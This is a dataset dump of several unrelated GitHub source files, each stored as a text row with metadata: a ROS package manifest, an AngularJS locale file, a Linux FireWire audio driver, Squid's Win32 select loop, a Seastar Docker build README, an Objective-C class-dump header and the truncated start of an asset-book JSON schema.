text
stringlengths 2
100k
| meta
dict |
---|---|
<package>
<name>msg_conversions</name>
<version>1.0.0</version>
<description>
This package converts FF msgs to standard messages visualizable in rviz.
</description>
<license>
Apache License, Version 2.0
</license>
<author email="[email protected]">
Astrobee Flight Software
</author>
<maintainer email="[email protected]">
Astrobee Flight Software
</maintainer>
<buildtool_depend>catkin</buildtool_depend>
<build_depend>roscpp</build_depend>
<build_depend>std_msgs</build_depend>
<build_depend>sensor_msgs</build_depend>
<build_depend>geometry_msgs</build_depend>
<build_depend>ff_msgs</build_depend>
<run_depend>roscpp</run_depend>
<run_depend>message_runtime</run_depend>
<run_depend>std_msgs</run_depend>
<run_depend>sensor_msgs</run_depend>
<run_depend>geometry_msgs</run_depend>
<run_depend>ff_msgs</run_depend>
</package>
| {
"pile_set_name": "Github"
} |
'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"am",
"pm"
],
"DAY": [
"dumingu",
"sigunda-fera",
"tersa-fera",
"kuarta-fera",
"kinta-fera",
"sesta-fera",
"sabadu"
],
"ERANAMES": [
"Antis di Kristu",
"Dispos di Kristu"
],
"ERAS": [
"AK",
"DK"
],
"FIRSTDAYOFWEEK": 0,
"MONTH": [
"Janeru",
"Febreru",
"Marsu",
"Abril",
"Maiu",
"Junhu",
"Julhu",
"Agostu",
"Setenbru",
"Otubru",
"Nuvenbru",
"Dizenbru"
],
"SHORTDAY": [
"dum",
"sig",
"ter",
"kua",
"kin",
"ses",
"sab"
],
"SHORTMONTH": [
"Jan",
"Feb",
"Mar",
"Abr",
"Mai",
"Jun",
"Jul",
"Ago",
"Set",
"Otu",
"Nuv",
"Diz"
],
"STANDALONEMONTH": [
"Janeru",
"Febreru",
"Marsu",
"Abril",
"Maiu",
"Junhu",
"Julhu",
"Agostu",
"Setenbru",
"Otubru",
"Nuvenbru",
"Dizenbru"
],
"WEEKENDRANGE": [
5,
6
],
"fullDate": "EEEE, d 'di' MMMM 'di' y",
"longDate": "d 'di' MMMM 'di' y",
"medium": "d MMM y HH:mm:ss",
"mediumDate": "d MMM y",
"mediumTime": "HH:mm:ss",
"short": "d/M/y HH:mm",
"shortDate": "d/M/y",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "CVE",
"DECIMAL_SEP": ",",
"GROUP_SEP": "\u00a0",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "-",
"negSuf": "\u00a0\u00a4",
"posPre": "",
"posSuf": "\u00a0\u00a4"
}
]
},
"id": "kea-cv",
"localeID": "kea_CV",
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
| {
"pile_set_name": "Github"
} |
// SPDX-License-Identifier: GPL-2.0-only
/*
* digi00x-transaction.c - a part of driver for Digidesign Digi 002/003 family
*
* Copyright (c) 2014-2015 Takashi Sakamoto
*/
#include <sound/asound.h>
#include "digi00x.h"
static void handle_unknown_message(struct snd_dg00x *dg00x,
unsigned long long offset, __be32 *buf)
{
unsigned long flags;
spin_lock_irqsave(&dg00x->lock, flags);
dg00x->msg = be32_to_cpu(*buf);
spin_unlock_irqrestore(&dg00x->lock, flags);
wake_up(&dg00x->hwdep_wait);
}
static void handle_message(struct fw_card *card, struct fw_request *request,
int tcode, int destination, int source,
int generation, unsigned long long offset,
void *data, size_t length, void *callback_data)
{
struct snd_dg00x *dg00x = callback_data;
__be32 *buf = (__be32 *)data;
fw_send_response(card, request, RCODE_COMPLETE);
if (offset == dg00x->async_handler.offset)
handle_unknown_message(dg00x, offset, buf);
}
int snd_dg00x_transaction_reregister(struct snd_dg00x *dg00x)
{
struct fw_device *device = fw_parent_device(dg00x->unit);
__be32 data[2];
/* Unknown. 4bytes. */
data[0] = cpu_to_be32((device->card->node_id << 16) |
(dg00x->async_handler.offset >> 32));
data[1] = cpu_to_be32(dg00x->async_handler.offset);
return snd_fw_transaction(dg00x->unit, TCODE_WRITE_BLOCK_REQUEST,
DG00X_ADDR_BASE + DG00X_OFFSET_MESSAGE_ADDR,
&data, sizeof(data), 0);
}
void snd_dg00x_transaction_unregister(struct snd_dg00x *dg00x)
{
if (dg00x->async_handler.callback_data == NULL)
return;
fw_core_remove_address_handler(&dg00x->async_handler);
dg00x->async_handler.callback_data = NULL;
}
int snd_dg00x_transaction_register(struct snd_dg00x *dg00x)
{
static const struct fw_address_region resp_register_region = {
.start = 0xffffe0000000ull,
.end = 0xffffe000ffffull,
};
int err;
dg00x->async_handler.length = 4;
dg00x->async_handler.address_callback = handle_message;
dg00x->async_handler.callback_data = dg00x;
err = fw_core_add_address_handler(&dg00x->async_handler,
&resp_register_region);
if (err < 0)
return err;
err = snd_dg00x_transaction_reregister(dg00x);
if (err < 0)
snd_dg00x_transaction_unregister(dg00x);
return err;
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 1996-2020 The Squid Software Foundation and contributors
*
* Squid software is distributed under GPLv2+ license and includes
* contributions from numerous individuals and organizations.
* Please see the COPYING and CONTRIBUTORS files for details.
*/
/* DEBUG: section 05 Socket Functions */
#include "squid.h"
#if USE_SELECT_WIN32
#include "anyp/PortCfg.h"
#include "comm/Connection.h"
#include "comm/Loops.h"
#include "fde.h"
#include "ICP.h"
#include "mgr/Registration.h"
#include "SquidTime.h"
#include "StatCounters.h"
#include "StatHist.h"
#include "Store.h"
#include <cerrno>
static int MAX_POLL_TIME = 1000; /* see also Comm::QuickPollRequired() */
#ifndef howmany
#define howmany(x, y) (((x)+((y)-1))/(y))
#endif
#ifndef NBBY
#define NBBY 8
#endif
#define FD_MASK_BYTES sizeof(fd_mask)
#define FD_MASK_BITS (FD_MASK_BYTES*NBBY)
/* STATIC */
static int examine_select(fd_set *, fd_set *);
static int fdIsTcpListener(int fd);
static int fdIsUdpListener(int fd);
static int fdIsDns(int fd);
static OBJH commIncomingStats;
static int comm_check_incoming_select_handlers(int nfds, int *fds);
static void comm_select_dns_incoming(void);
static void commUpdateReadBits(int fd, PF * handler);
static void commUpdateWriteBits(int fd, PF * handler);
static struct timeval zero_tv;
static fd_set global_readfds;
static fd_set global_writefds;
static int nreadfds;
static int nwritefds;
/*
* Automatic tuning for incoming requests:
*
* INCOMING sockets are the ICP and HTTP ports. We need to check these
* fairly regularly, but how often? When the load increases, we
* want to check the incoming sockets more often. If we have a lot
* of incoming ICP, then we need to check these sockets more than
* if we just have HTTP.
*
* The variables 'incoming_udp_interval' and 'incoming_tcp_interval'
* determine how many normal I/O events to process before checking
* incoming sockets again. Note we store the incoming_interval
* multiplied by a factor of (2^INCOMING_FACTOR) to have some
* pseudo-floating point precision.
*
* The variable 'udp_io_events' and 'tcp_io_events' counts how many normal
* I/O events have been processed since the last check on the incoming
* sockets. When io_events > incoming_interval, its time to check incoming
* sockets.
*
* Every time we check incoming sockets, we count how many new messages
* or connections were processed. This is used to adjust the
* incoming_interval for the next iteration. The new incoming_interval
* is calculated as the current incoming_interval plus what we would
* like to see as an average number of events minus the number of
* events just processed.
*
* incoming_interval = incoming_interval + target_average - number_of_events_processed
*
* There are separate incoming_interval counters for DNS, UDP and TCP events
*
* You can see the current values of the incoming_interval's, as well as
* a histogram of 'incoming_events' by asking the cache manager
* for 'comm_incoming', e.g.:
*
* % ./client mgr:comm_incoming
*
* Caveats:
*
* - We have MAX_INCOMING_INTEGER as a magic upper limit on
* incoming_interval for both types of sockets. At the
* largest value the cache will effectively be idling.
*
* - The higher the INCOMING_FACTOR, the slower the algorithm will
* respond to load spikes/increases/decreases in demand. A value
* between 3 and 8 is recommended.
*/
#define MAX_INCOMING_INTEGER 256
#define INCOMING_FACTOR 5
#define MAX_INCOMING_INTERVAL (MAX_INCOMING_INTEGER << INCOMING_FACTOR)
static int udp_io_events = 0;
static int dns_io_events = 0;
static int tcp_io_events = 0;
static int incoming_udp_interval = 16 << INCOMING_FACTOR;
static int incoming_dns_interval = 16 << INCOMING_FACTOR;
static int incoming_tcp_interval = 16 << INCOMING_FACTOR;
#define commCheckUdpIncoming (++udp_io_events > (incoming_udp_interval>> INCOMING_FACTOR))
#define commCheckDnsIncoming (++dns_io_events > (incoming_dns_interval>> INCOMING_FACTOR))
#define commCheckTcpIncoming (++tcp_io_events > (incoming_tcp_interval>> INCOMING_FACTOR))
void
Comm::SetSelect(int fd, unsigned int type, PF * handler, void *client_data, time_t timeout)
{
fde *F = &fd_table[fd];
assert(fd >= 0);
assert(F->flags.open || (!handler && !client_data && !timeout));
debugs(5, 5, HERE << "FD " << fd << ", type=" << type <<
", handler=" << handler << ", client_data=" << client_data <<
", timeout=" << timeout);
if (type & COMM_SELECT_READ) {
F->read_handler = handler;
F->read_data = client_data;
commUpdateReadBits(fd, handler);
}
if (type & COMM_SELECT_WRITE) {
F->write_handler = handler;
F->write_data = client_data;
commUpdateWriteBits(fd, handler);
}
if (timeout)
F->timeout = squid_curtime + timeout;
}
static int
fdIsUdpListener(int fd)
{
if (icpIncomingConn != NULL && fd == icpIncomingConn->fd)
return 1;
if (icpOutgoingConn != NULL && fd == icpOutgoingConn->fd)
return 1;
return 0;
}
static int
fdIsDns(int fd)
{
if (fd == DnsSocketA)
return 1;
if (fd == DnsSocketB)
return 1;
return 0;
}
static int
fdIsTcpListener(int fd)
{
for (AnyP::PortCfgPointer s = HttpPortList; s != NULL; s = s->next) {
if (s->listenConn != NULL && s->listenConn->fd == fd)
return 1;
}
return 0;
}
static int
comm_check_incoming_select_handlers(int nfds, int *fds)
{
int i;
int fd;
int maxfd = 0;
PF *hdl = NULL;
fd_set read_mask;
fd_set write_mask;
FD_ZERO(&read_mask);
FD_ZERO(&write_mask);
incoming_sockets_accepted = 0;
for (i = 0; i < nfds; ++i) {
fd = fds[i];
if (fd_table[fd].read_handler) {
FD_SET(fd, &read_mask);
if (fd > maxfd)
maxfd = fd;
}
if (fd_table[fd].write_handler) {
FD_SET(fd, &write_mask);
if (fd > maxfd)
maxfd = fd;
}
}
if (maxfd++ == 0)
return -1;
getCurrentTime();
++ statCounter.syscalls.selects;
if (select(maxfd, &read_mask, &write_mask, NULL, &zero_tv) < 1)
return incoming_sockets_accepted;
for (i = 0; i < nfds; ++i) {
fd = fds[i];
if (FD_ISSET(fd, &read_mask)) {
if ((hdl = fd_table[fd].read_handler) != NULL) {
fd_table[fd].read_handler = NULL;
commUpdateReadBits(fd, NULL);
hdl(fd, fd_table[fd].read_data);
} else {
debugs(5, DBG_IMPORTANT, "comm_select_incoming: FD " << fd << " NULL read handler");
}
}
if (FD_ISSET(fd, &write_mask)) {
if ((hdl = fd_table[fd].write_handler) != NULL) {
fd_table[fd].write_handler = NULL;
commUpdateWriteBits(fd, NULL);
hdl(fd, fd_table[fd].write_data);
} else {
debugs(5, DBG_IMPORTANT, "comm_select_incoming: FD " << fd << " NULL write handler");
}
}
}
return incoming_sockets_accepted;
}
static void
comm_select_udp_incoming(void)
{
int nfds = 0;
int fds[2];
int nevents;
udp_io_events = 0;
if (Comm::IsConnOpen(icpIncomingConn)) {
fds[nfds] = icpIncomingConn->fd;
++nfds;
}
if (Comm::IsConnOpen(icpOutgoingConn) && icpIncomingConn != icpOutgoingConn) {
fds[nfds] = icpOutgoingConn->fd;
++nfds;
}
if (nfds == 0)
return;
nevents = comm_check_incoming_select_handlers(nfds, fds);
incoming_udp_interval += Config.comm_incoming.udp.average - nevents;
if (incoming_udp_interval < 0)
incoming_udp_interval = 0;
if (incoming_udp_interval > MAX_INCOMING_INTERVAL)
incoming_udp_interval = MAX_INCOMING_INTERVAL;
if (nevents > INCOMING_UDP_MAX)
nevents = INCOMING_UDP_MAX;
statCounter.comm_udp_incoming.count(nevents);
}
static void
comm_select_tcp_incoming(void)
{
int nfds = 0;
int fds[MAXTCPLISTENPORTS];
int nevents;
tcp_io_events = 0;
// XXX: only poll sockets that won't be deferred. But how do we identify them?
for (AnyP::PortCfgPointer s = HttpPortList; s != NULL; s = s->next) {
if (Comm::IsConnOpen(s->listenConn)) {
fds[nfds] = s->listenConn->fd;
++nfds;
}
}
nevents = comm_check_incoming_select_handlers(nfds, fds);
incoming_tcp_interval += Config.comm_incoming.tcp.average - nevents;
if (incoming_tcp_interval < 0)
incoming_tcp_interval = 0;
if (incoming_tcp_interval > MAX_INCOMING_INTERVAL)
incoming_tcp_interval = MAX_INCOMING_INTERVAL;
if (nevents > INCOMING_TCP_MAX)
nevents = INCOMING_TCP_MAX;
statCounter.comm_tcp_incoming.count(nevents);
}
#define DEBUG_FDBITS 0
/* Select on all sockets; call handlers for those that are ready. */
Comm::Flag
Comm::DoSelect(int msec)
{
fd_set readfds;
fd_set pendingfds;
fd_set writefds;
PF *hdl = NULL;
int fd;
int maxfd;
int num;
int pending;
int calldns = 0, calludp = 0, calltcp = 0;
int j;
#if DEBUG_FDBITS
int i;
#endif
struct timeval poll_time;
double timeout = current_dtime + (msec / 1000.0);
fde *F;
int no_bits;
fd_set errfds;
FD_ZERO(&errfds);
do {
double start;
getCurrentTime();
start = current_dtime;
if (commCheckUdpIncoming)
comm_select_udp_incoming();
if (commCheckDnsIncoming)
comm_select_dns_incoming();
if (commCheckTcpIncoming)
comm_select_tcp_incoming();
calldns = calludp = calltcp = 0;
maxfd = Biggest_FD + 1;
memcpy(&readfds, &global_readfds, sizeof(global_readfds));
memcpy(&writefds, &global_writefds, sizeof(global_writefds));
memcpy(&errfds, &global_writefds, sizeof(global_writefds));
/* remove stalled FDs, and deal with pending descriptors */
pending = 0;
FD_ZERO(&pendingfds);
for (j = 0; j < (int) readfds.fd_count; ++j) {
register int readfds_handle = readfds.fd_array[j];
no_bits = 1;
for ( fd = Biggest_FD; fd; --fd ) {
if ( fd_table[fd].win32.handle == readfds_handle ) {
if (fd_table[fd].flags.open) {
no_bits = 0;
break;
}
}
}
if (no_bits)
continue;
if (FD_ISSET(fd, &readfds) && fd_table[fd].flags.read_pending) {
FD_SET(fd, &pendingfds);
++pending;
}
}
#if DEBUG_FDBITS
for (i = 0; i < maxfd; ++i) {
/* Check each open socket for a handler. */
if (fd_table[i].read_handler) {
assert(FD_ISSET(i, readfds));
}
if (fd_table[i].write_handler) {
assert(FD_ISSET(i, writefds));
}
}
#endif
if (nreadfds + nwritefds == 0) {
assert(shutting_down);
return Comm::SHUTDOWN;
}
if (msec > MAX_POLL_TIME)
msec = MAX_POLL_TIME;
if (pending)
msec = 0;
for (;;) {
poll_time.tv_sec = msec / 1000;
poll_time.tv_usec = (msec % 1000) * 1000;
++ statCounter.syscalls.selects;
num = select(maxfd, &readfds, &writefds, &errfds, &poll_time);
int xerrno = errno;
++ statCounter.select_loops;
if (num >= 0 || pending > 0)
break;
if (ignoreErrno(xerrno))
break;
debugs(5, DBG_CRITICAL, MYNAME << "WARNING: select failure: " << xstrerr(xerrno));
examine_select(&readfds, &writefds);
return Comm::COMM_ERROR;
/* NOTREACHED */
}
if (num < 0 && !pending)
continue;
getCurrentTime();
debugs(5, num ? 5 : 8, "comm_select: " << num << "+" << pending << " FDs ready");
statCounter.select_fds_hist.count(num);
if (num == 0 && pending == 0)
continue;
/* Scan return fd masks for ready descriptors */
assert(readfds.fd_count <= (unsigned int) Biggest_FD);
assert(pendingfds.fd_count <= (unsigned int) Biggest_FD);
for (j = 0; j < (int) readfds.fd_count; ++j) {
register int readfds_handle = readfds.fd_array[j];
register int pendingfds_handle = pendingfds.fd_array[j];
register int osfhandle;
no_bits = 1;
for ( fd = Biggest_FD; fd; --fd ) {
osfhandle = fd_table[fd].win32.handle;
if (( osfhandle == readfds_handle ) ||
( osfhandle == pendingfds_handle )) {
if (fd_table[fd].flags.open) {
no_bits = 0;
break;
}
}
}
if (no_bits)
continue;
#if DEBUG_FDBITS
debugs(5, 9, "FD " << fd << " bit set for reading");
assert(FD_ISSET(fd, readfds));
#endif
if (fdIsUdpListener(fd)) {
calludp = 1;
continue;
}
if (fdIsDns(fd)) {
calldns = 1;
continue;
}
if (fdIsTcpListener(fd)) {
calltcp = 1;
continue;
}
F = &fd_table[fd];
debugs(5, 6, "comm_select: FD " << fd << " ready for reading");
if ((hdl = F->read_handler)) {
F->read_handler = NULL;
commUpdateReadBits(fd, NULL);
hdl(fd, F->read_data);
++ statCounter.select_fds;
if (commCheckUdpIncoming)
comm_select_udp_incoming();
if (commCheckDnsIncoming)
comm_select_dns_incoming();
if (commCheckTcpIncoming)
comm_select_tcp_incoming();
}
}
assert(errfds.fd_count <= (unsigned int) Biggest_FD);
for (j = 0; j < (int) errfds.fd_count; ++j) {
register int errfds_handle = errfds.fd_array[j];
for ( fd = Biggest_FD; fd; --fd ) {
if ( fd_table[fd].win32.handle == errfds_handle )
break;
}
if (fd_table[fd].flags.open) {
F = &fd_table[fd];
if ((hdl = F->write_handler)) {
F->write_handler = NULL;
commUpdateWriteBits(fd, NULL);
hdl(fd, F->write_data);
++ statCounter.select_fds;
}
}
}
assert(writefds.fd_count <= (unsigned int) Biggest_FD);
for (j = 0; j < (int) writefds.fd_count; ++j) {
register int writefds_handle = writefds.fd_array[j];
no_bits = 1;
for ( fd = Biggest_FD; fd; --fd ) {
if ( fd_table[fd].win32.handle == writefds_handle ) {
if (fd_table[fd].flags.open) {
no_bits = 0;
break;
}
}
}
if (no_bits)
continue;
#if DEBUG_FDBITS
debugs(5, 9, "FD " << fd << " bit set for writing");
assert(FD_ISSET(fd, writefds));
#endif
if (fdIsUdpListener(fd)) {
calludp = 1;
continue;
}
if (fdIsDns(fd)) {
calldns = 1;
continue;
}
if (fdIsTcpListener(fd)) {
calltcp = 1;
continue;
}
F = &fd_table[fd];
debugs(5, 6, "comm_select: FD " << fd << " ready for writing");
if ((hdl = F->write_handler)) {
F->write_handler = NULL;
commUpdateWriteBits(fd, NULL);
hdl(fd, F->write_data);
++ statCounter.select_fds;
if (commCheckUdpIncoming)
comm_select_udp_incoming();
if (commCheckDnsIncoming)
comm_select_dns_incoming();
if (commCheckTcpIncoming)
comm_select_tcp_incoming();
}
}
if (calludp)
comm_select_udp_incoming();
if (calldns)
comm_select_dns_incoming();
if (calltcp)
comm_select_tcp_incoming();
getCurrentTime();
statCounter.select_time += (current_dtime - start);
return Comm::OK;
} while (timeout > current_dtime);
debugs(5, 8, "comm_select: time out: " << squid_curtime);
return Comm::TIMEOUT;
}
static void
comm_select_dns_incoming(void)
{
int nfds = 0;
int fds[3];
int nevents;
dns_io_events = 0;
if (DnsSocketA < 0 && DnsSocketB < 0)
return;
if (DnsSocketA >= 0) {
fds[nfds] = DnsSocketA;
++nfds;
}
if (DnsSocketB >= 0) {
fds[nfds] = DnsSocketB;
++nfds;
}
nevents = comm_check_incoming_select_handlers(nfds, fds);
if (nevents < 0)
return;
incoming_dns_interval += Config.comm_incoming.dns.average - nevents;
if (incoming_dns_interval < Config.comm_incoming.dns.min_poll)
incoming_dns_interval = Config.comm_incoming.dns.min_poll;
if (incoming_dns_interval > MAX_INCOMING_INTERVAL)
incoming_dns_interval = MAX_INCOMING_INTERVAL;
if (nevents > INCOMING_DNS_MAX)
nevents = INCOMING_DNS_MAX;
statCounter.comm_dns_incoming.count(nevents);
}
void
Comm::SelectLoopInit(void)
{
zero_tv.tv_sec = 0;
zero_tv.tv_usec = 0;
FD_ZERO(&global_readfds);
FD_ZERO(&global_writefds);
nreadfds = nwritefds = 0;
Mgr::RegisterAction("comm_select_incoming",
"comm_incoming() stats",
commIncomingStats, 0, 1);
}
/*
* examine_select - debug routine.
*
* I spend the day chasing this core dump that occurs when both the client
* and the server side of a cache fetch simultaneoulsy abort the
* connection. While I haven't really studied the code to figure out how
* it happens, the snippet below may prevent the cache from exitting:
*
* Call this from where the select loop fails.
*/
static int
examine_select(fd_set * readfds, fd_set * writefds)
{
int fd = 0;
fd_set read_x;
fd_set write_x;
struct timeval tv;
AsyncCall::Pointer ch = NULL;
fde *F = NULL;
struct stat sb;
debugs(5, DBG_CRITICAL, "examine_select: Examining open file descriptors...");
for (fd = 0; fd < Squid_MaxFD; ++fd) {
FD_ZERO(&read_x);
FD_ZERO(&write_x);
tv.tv_sec = tv.tv_usec = 0;
if (FD_ISSET(fd, readfds))
FD_SET(fd, &read_x);
else if (FD_ISSET(fd, writefds))
FD_SET(fd, &write_x);
else
continue;
++ statCounter.syscalls.selects;
errno = 0;
if (!fstat(fd, &sb)) {
debugs(5, 5, "FD " << fd << " is valid.");
continue;
}
int xerrno = errno;
F = &fd_table[fd];
debugs(5, DBG_CRITICAL, "fstat(FD " << fd << "): " << xstrerr(xerrno));
debugs(5, DBG_CRITICAL, "WARNING: FD " << fd << " has handlers, but it's invalid.");
debugs(5, DBG_CRITICAL, "FD " << fd << " is a " << fdTypeStr[F->type] << " called '" << F->desc << "'");
debugs(5, DBG_CRITICAL, "tmout:" << F->timeoutHandler << " read:" << F->read_handler << " write:" << F->write_handler);
for (ch = F->closeHandler; ch != NULL; ch = ch->Next())
debugs(5, DBG_CRITICAL, " close handler: " << ch);
if (F->closeHandler != NULL) {
commCallCloseHandlers(fd);
} else if (F->timeoutHandler != NULL) {
debugs(5, DBG_CRITICAL, "examine_select: Calling Timeout Handler");
ScheduleCallHere(F->timeoutHandler);
}
F->closeHandler = NULL;
F->timeoutHandler = NULL;
F->read_handler = NULL;
F->write_handler = NULL;
FD_CLR(fd, readfds);
FD_CLR(fd, writefds);
}
return 0;
}
static void
commIncomingStats(StoreEntry * sentry)
{
storeAppendPrintf(sentry, "Current incoming_udp_interval: %d\n",
incoming_udp_interval >> INCOMING_FACTOR);
storeAppendPrintf(sentry, "Current incoming_dns_interval: %d\n",
incoming_dns_interval >> INCOMING_FACTOR);
storeAppendPrintf(sentry, "Current incoming_tcp_interval: %d\n",
incoming_tcp_interval >> INCOMING_FACTOR);
storeAppendPrintf(sentry, "\n");
storeAppendPrintf(sentry, "Histogram of events per incoming socket type\n");
storeAppendPrintf(sentry, "ICP Messages handled per comm_select_udp_incoming() call:\n");
statCounter.comm_udp_incoming.dump(sentry, statHistIntDumper);
storeAppendPrintf(sentry, "DNS Messages handled per comm_select_dns_incoming() call:\n");
statCounter.comm_dns_incoming.dump(sentry, statHistIntDumper);
storeAppendPrintf(sentry, "HTTP Messages handled per comm_select_tcp_incoming() call:\n");
statCounter.comm_tcp_incoming.dump(sentry, statHistIntDumper);
}
void
commUpdateReadBits(int fd, PF * handler)
{
if (handler && !FD_ISSET(fd, &global_readfds)) {
FD_SET(fd, &global_readfds);
++nreadfds;
} else if (!handler && FD_ISSET(fd, &global_readfds)) {
FD_CLR(fd, &global_readfds);
--nreadfds;
}
}
void
commUpdateWriteBits(int fd, PF * handler)
{
if (handler && !FD_ISSET(fd, &global_writefds)) {
FD_SET(fd, &global_writefds);
++nwritefds;
} else if (!handler && FD_ISSET(fd, &global_writefds)) {
FD_CLR(fd, &global_writefds);
--nwritefds;
}
}
/* Called by async-io or diskd to speed up the polling */
void
Comm::QuickPollRequired(void)
{
MAX_POLL_TIME = 10;
}
#endif /* USE_SELECT_WIN32 */
| {
"pile_set_name": "Github"
} |
## Building seastar in Docker container
To build a Docker image:
```
docker build -t seastar-dev docker/dev
```
Create an shell function for building insider the container (bash syntax given):
```
$ seabuild() { docker run -v $HOME/seastar/:/seastar -u $(id -u):$(id -g) -w /seastar -t seastar-dev "$@"; }
```
(it is recommended to put this inside your .bashrc or similar)
To build inside a container:
```
$ seabuild ./configure.py
$ seabuild ninja -C build/release
```
| {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <AppKit/NSViewController.h>
@class NSButton, NSStackView, NSView, _TtC12ControlStrip24ControlStripBackdropView;
@interface ControlStrip.ControlStripFull : NSViewController
{
// Error parsing type: , name: closeView
// Error parsing type: , name: closeButton
// Error parsing type: , name: backdropView
// Error parsing type: , name: buttonStack
// Error parsing type: , name: configuration
}
- (CDUnknownBlockType).cxx_destruct;
- (id)initWithCoder:(id)arg1;
- (id)initWithNibName:(id)arg1 bundle:(id)arg2;
- (void)dismiss:(id)arg1;
- (void)awakeFromNib;
@property(nonatomic, retain) NSStackView *buttonStack; // @synthesize buttonStack;
@property(nonatomic, retain) _TtC12ControlStrip24ControlStripBackdropView *backdropView; // @synthesize backdropView;
@property(nonatomic, retain) NSButton *closeButton; // @synthesize closeButton;
@property(nonatomic, retain) NSView *closeView; // @synthesize closeView;
@end
| {
"pile_set_name": "Github"
} |
{
"jsonSchemaSemanticVersion": "1.0.0",
"imports": [
{
"corpusPath": "cdm:/foundations.1.2.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Common.1.0.cdm.json",
"moniker": "base_Common"
},
{
"corpusPath": "/core/operationsCommon/DataEntityView.1.0.cdm.json",
"moniker": "base_DataEntityView"
},
{
"corpusPath": "AssetAcquisitionMethod.1.1.cdm.json"
},
{
"corpusPath": "AssetBookTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Transaction/AssetChangesHistory.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetConsumptionFactor.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetConsumptionUnit.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetLedger.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetReserveType.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetRevaluationGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetSorting.1.1.cdm.json"
},
{
"corpusPath": "AssetTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Transaction/AssetTrans.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/AccountsReceivable/Transaction/CustInvoiceJour.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Common/Customer/Main/CustTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FinancialDimensions/Main/DimensionAttributeValueSet.1.0.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Group/AssetDepreciationGroup_W.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FinancialDimensions/Main/MainAccount.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/ProcurementAndSourcing/WorksheetHeader/PurchTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/Vendor/Main/VendTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/FixedAssets/Parameter/AssetDepreciationProfile.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/Inventory/Transaction/InventTransOrigin.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Common/Currency/Group/Currency.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/RAsset/Group/RAssetSubGroup.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/System/SystemAdministration/Framework/NumberSequenceGroup.1.0.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/SupplyChain/SalesAndMarketing/WorksheetHeader/SalesTable.1.1.cdm.json"
},
{
"corpusPath": "/core/operationsCommon/Tables/Finance/Ledger/Main/CompanyInfo.1.1.cdm.json"
}
],
"definitions": [
{
"entityName": "AssetBook",
"extendsEntity": "base_Common/Common",
"exhibitsTraits": [
{
"traitReference": "is.CDM.entityVersion",
"arguments": [
{
"name": "versionNumber",
"value": "1.1"
}
]
}
],
"hasAttributes": [
{
"name": "AcquisitionDate",
"dataType": "AssetAcquisitionDate",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionMethod",
"dataType": "AssetAcquisitionMethodId",
"isNullable": true,
"description": ""
},
{
"name": "AcquisitionPrice",
"dataType": "AssetAcquisitionPrice",
"isNullable": true,
"description": ""
},
{
"name": "AllocationStartDate_JP",
"dataType": "TransDate",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "AllowableLimitForAccumulatedDepType_JP",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "AssetCostAccountingType_PL",
"dataType": "integer",
"isNullable": true,
"description": ""
},
{
"name": "AssetDerogatoryModel_FR",
"dataType": "AssetDerogatoryValueModel_FR",
"isReadOnly": true,
"isNullable": true,
"description": ""
},
{
"name": "AssetFairValue",
"dataType": "AssetFairValue",
"isNullable": true,
"description": ""
},
{
